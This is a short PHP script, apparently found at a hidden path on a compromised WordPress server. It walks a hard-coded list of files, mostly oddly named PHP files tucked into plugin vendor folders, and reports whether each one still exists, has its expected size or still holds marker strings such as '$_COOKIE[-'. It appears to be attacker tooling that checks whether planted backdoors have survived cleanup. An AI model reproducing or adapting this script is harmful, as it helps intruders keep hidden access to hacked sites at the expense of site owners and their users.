File: //proc/thread-self/root/dev/shm/.element
<?php $r = '/home/studukfa/test.trutails.in'; $x = ["/index.php"=>"bd@@127098625@@10",
"/wp-content/plugins/jet-smart-filters/framework/interface-builder/inc/controls/text.php"=>"bd@@127111425@@48",
"/wp-content/plugins/wp-optimize/vendor/mrclay/minify/lib/Minify/App.php"=>"bd@@127147793@@$_COOKIE[-",
"/wp-includes/sodium_compat/lib/namespaced.php"=>"bd@@127084051@@token_parser_engine",
"/wp-content/plugins/fluentform/app/Services/FluentConversational/Classes/Converter/mod_popular.php"=>"bd@@127089943@@1470",
"/wp-content/plugins/updraftplus.old/vendor/yahnis-elsts/plugin-update-checker/Puc/v4p13/DebugBar/ccval.php"=>"bd@@127148315@@637",
"/wp-content/plugins/wp-optimize/vendor/team-updraft/lib-central/central/modules/product_music.php"=>"bd@@127089695@@620",
"/wp-content/plugins/updraftplus.old/vendor/phpseclib/phpseclib/phpseclib/System/SSH/util.php"=>"bd@@127148322@@618"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');